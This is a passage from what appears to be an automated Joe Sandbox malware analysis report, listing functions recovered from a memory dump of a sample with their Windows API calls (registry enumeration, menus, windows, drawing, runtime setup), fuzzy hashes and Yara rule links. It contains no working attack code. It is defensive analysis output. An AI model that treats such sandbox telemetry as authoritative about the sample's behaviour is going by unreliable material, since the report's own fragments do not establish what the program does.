                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                    • Part of subcall function 00F03AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F02AA6,?,?), ref: 00F03B0E
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F02FA0
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F02FE0
                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F03003
                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F0302C
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F0306F
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F0307C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4046560759-0
                                                                                                                                  • Opcode ID: 01625c7c4f943d00469f9e0868cc485cc1023ac7e7f7929653c60e2cad2ac071
                                                                                                                                  • Instruction ID: d8635535a246506b68802107a4f0d62210f066c640ad461871fda7831ee64c45
                                                                                                                                  • Opcode Fuzzy Hash: 01625c7c4f943d00469f9e0868cc485cc1023ac7e7f7929653c60e2cad2ac071
                                                                                                                                  • Instruction Fuzzy Hash: 56516B326082049FC714EF64CC85E6EBBE8FF89314F04491DF5969B2A1DB71EA05EB52
                                                                                                                                  Function 00EBDB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$_wcscat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2037614760-0
                                                                                                                                  • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                  • Instruction ID: cbb052c5080d1801dca5d70adfbdbb4d2fd14047be413bc939aec0d3aa857941
                                                                                                                                  • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                                                                                                                                  • Instruction Fuzzy Hash: DF512830908115AACB16AF98D841AFFFBF0EF45314F50604AF581BB182EB755F52DB94
                                                                                                                                  Function 00EE2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EE2AF6
                                                                                                                                  • VariantClear.OLEAUT32(00000013), ref: 00EE2B68
                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00EE2BC3
                                                                                                                                  • _memmove.LIBCMT ref: 00EE2BED
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EE2C3A
                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EE2C68
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1101466143-0
                                                                                                                                  • Opcode ID: cbf53df342971d858c1992c89e5961f003abf959eadc38f77dba755719124fc0
                                                                                                                                  • Instruction ID: 1bf7b8c893239aabe8f2a9c29a9c8f2e9a16498afdbe98934a13f17d5bfc25b6
                                                                                                                                  • Opcode Fuzzy Hash: cbf53df342971d858c1992c89e5961f003abf959eadc38f77dba755719124fc0
                                                                                                                                  • Instruction Fuzzy Hash: 34515DB5A0024DEFDB14CF58C880AAAB7B8FF4C314B258559EA59EB314D730E951CFA0
                                                                                                                                  Function 00F082DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetMenu.USER32(?), ref: 00F0833D
                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00F08374
                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F0839C
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00F0840B
                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00F08419
                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F0846A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 650687236-0
                                                                                                                                  • Opcode ID: b1e85d8352c832dbe4c92cfb5bb918e614986b7b8253b0441713aa5cbd4b8cb7
                                                                                                                                  • Instruction ID: 44fbb8a9c86fa8085e9d23930a7c94085b7dd97e65ad79ee46e04f2615b2187f
                                                                                                                                  • Opcode Fuzzy Hash: b1e85d8352c832dbe4c92cfb5bb918e614986b7b8253b0441713aa5cbd4b8cb7
                                                                                                                                  • Instruction Fuzzy Hash: B851AF75E00219EFCF10EFA4C941AAEB7F4EF48760F144059E951BB391CB70AE42AB90
                                                                                                                                  Function 00EE54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EE552E
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE5579
                                                                                                                                  • IsMenu.USER32(00000000), ref: 00EE5599
                                                                                                                                  • CreatePopupMenu.USER32 ref: 00EE55CD
                                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00EE562B
                                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EE565C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3311875123-0
                                                                                                                                  • Opcode ID: e040dc19ef28061f7390822c8c58097faf89a3fc06d124d77c6d6fc81ab662cc
                                                                                                                                  • Instruction ID: 0abb7f87a6c7f866695b3c6b4d8039c4c96ce2f3c60db1014fa1c3978762905c
                                                                                                                                  • Opcode Fuzzy Hash: e040dc19ef28061f7390822c8c58097faf89a3fc06d124d77c6d6fc81ab662cc
                                                                                                                                  • Instruction Fuzzy Hash: 2251E072600A8EEFDF20CF69C888BAEBBF5AF0531CF545519E406AB290D3B08944CB51
                                                                                                                                  Function 00EBB18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00EBB1C1
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00EBB225
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00EBB242
                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EBB253
                                                                                                                                  • EndPaint.USER32(?,?), ref: 00EBB29D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1827037458-0
                                                                                                                                  • Opcode ID: 7afaf7d51476a840fbe6effcfe6492bfbd37b0a82395338bf036601ead7063d3
                                                                                                                                  • Instruction ID: 12a10285db3f704e2ba29263ccdad554c96bb44840c57dbe0972e4bcd9363a47
                                                                                                                                  • Opcode Fuzzy Hash: 7afaf7d51476a840fbe6effcfe6492bfbd37b0a82395338bf036601ead7063d3
                                                                                                                                  • Instruction Fuzzy Hash: C5419D705002049FD721DF28DC84BFB7BE8FB45320F180669F9A5972B1C7B19849AB62
                                                                                                                                  Function 00F0E1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00F61810,00000000,?,?,00F61810,00F61810,?,00F1E2D6), ref: 00F0E21B
                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00F0E23F
                                                                                                                                  • ShowWindow.USER32(00F61810,00000000,?,?,00F61810,00F61810,?,00F1E2D6), ref: 00F0E29F
                                                                                                                                  • ShowWindow.USER32(?,00000004,?,?,00F61810,00F61810,?,00F1E2D6), ref: 00F0E2B1
                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00F0E2D5
                                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F0E2F8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                  • Opcode ID: 50447c33e04c37ddfb8cd8241910085aa69f7409febffdf6cc6d7346dbb7fece
                                                                                                                                  • Instruction ID: dce717d7f5dc95430a35a481b8aabdc809dfaabb630e8953a98b4eaf6cc03426
                                                                                                                                  • Opcode Fuzzy Hash: 50447c33e04c37ddfb8cd8241910085aa69f7409febffdf6cc6d7346dbb7fece
                                                                                                                                  • Instruction Fuzzy Hash: 7D419070E04144EFDB26CF14C499B947BE5BF0A324F1845B9EA488F2E2C731A846FB51
                                                                                                                                  Function 00EF1BFA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 308COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                    • Part of subcall function 00EA3BCF: _wcscpy.LIBCMT ref: 00EA3BF2
                                                                                                                                  • _wcstok.LIBCMT ref: 00EF1D6E
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EF1DFD
                                                                                                                                  • _memset.LIBCMT ref: 00EF1E30
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 774024439-3081909835
                                                                                                                                  • Opcode ID: b5629cac15639f9b3c60e506a6df257447183f2f492ccdd68232bb0bd2dec7d1
                                                                                                                                  • Instruction ID: c12079a37dafce98be37be64ca021595850a9dfb7d3d227a31061335ca61658f
                                                                                                                                  • Opcode Fuzzy Hash: b5629cac15639f9b3c60e506a6df257447183f2f492ccdd68232bb0bd2dec7d1
                                                                                                                                  • Instruction Fuzzy Hash: 7BC17431608344DFC714EF24C881A6AB7E4FF8A314F10596DF995AB2A2DB70ED45CB92
                                                                                                                                  Function 00F0E9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EBB5EB
                                                                                                                                    • Part of subcall function 00EBB58B: SelectObject.GDI32(?,00000000), ref: 00EBB5FA
                                                                                                                                    • Part of subcall function 00EBB58B: BeginPath.GDI32(?), ref: 00EBB611
                                                                                                                                    • Part of subcall function 00EBB58B: SelectObject.GDI32(?,00000000), ref: 00EBB63B
                                                                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F0E9F2
                                                                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00F0EA06
                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0EA14
                                                                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00F0EA24
                                                                                                                                  • EndPath.GDI32(00000000), ref: 00F0EA34
                                                                                                                                  • StrokePath.GDI32(00000000), ref: 00F0EA44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 43455801-0
                                                                                                                                  • Opcode ID: bf4f3dd825445f4c2a751f4183aa1a2232308808fdbae1f8331b0752a315b9fb
                                                                                                                                  • Instruction ID: 696447ab4aa846cc0fc5b8785610e3641d3e1d40ec8884d45ab948428032b640
                                                                                                                                  • Opcode Fuzzy Hash: bf4f3dd825445f4c2a751f4183aa1a2232308808fdbae1f8331b0752a315b9fb
                                                                                                                                  • Instruction Fuzzy Hash: 4511C97640014DBFEF129F90DC88E9A7FADFB08364F048011FA595A171D7719D56EBA0
                                                                                                                                  Function 00EDEF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 00EDEFB6
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EDEFC7
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EDEFCE
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00EDEFD6
                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00EDEFED
                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00EDEFFF
                                                                                                                                    • Part of subcall function 00EDA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00EDA79D,00000000,00000000,?,00EDAB73), ref: 00EDB2CA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 603618608-0
                                                                                                                                  • Opcode ID: 127234855546adfd68912df4ebf357d7fc431ac44f7750af6ce6294df6a4b1f9
                                                                                                                                  • Instruction ID: 9d3a8418b531f73cc0521ec2695bfe7b65c7923450061022ed3ff75a41db8f6f
                                                                                                                                  • Opcode Fuzzy Hash: 127234855546adfd68912df4ebf357d7fc431ac44f7750af6ce6294df6a4b1f9
                                                                                                                                  • Instruction Fuzzy Hash: AC018475A00309BFEB109BA59C49B5EBFB8EB48351F044066FE04FB390D6709D02DB61
                                                                                                                                  Function 00EC87D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __init_pointers.LIBCMT ref: 00EC87D7
                                                                                                                                    • Part of subcall function 00EC1E5A: __initp_misc_winsig.LIBCMT ref: 00EC1E7E
                                                                                                                                    • Part of subcall function 00EC1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EC8BE1
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EC8BF5
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EC8C08
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EC8C1B
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EC8C2E
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EC8C41
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EC8C54
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EC8C67
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EC8C7A
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EC8C8D
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EC8CA0
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EC8CB3
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EC8CC6
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EC8CD9
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EC8CEC
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00EC8CFF
                                                                                                                                  • __mtinitlocks.LIBCMT ref: 00EC87DC
                                                                                                                                    • Part of subcall function 00EC8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00F5AC68,00000FA0,?,?,00EC87E1,00EC6AFA,00F567D8,00000014), ref: 00EC8AD1
                                                                                                                                  • __mtterm.LIBCMT ref: 00EC87E5
                                                                                                                                    • Part of subcall function 00EC884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00EC89CF
                                                                                                                                    • Part of subcall function 00EC884D: _free.LIBCMT ref: 00EC89D6
                                                                                                                                    • Part of subcall function 00EC884D: RtlDeleteCriticalSection.NTDLL(00F5AC68), ref: 00EC89F8
                                                                                                                                  • __calloc_crt.LIBCMT ref: 00EC880A
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00EC8833
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
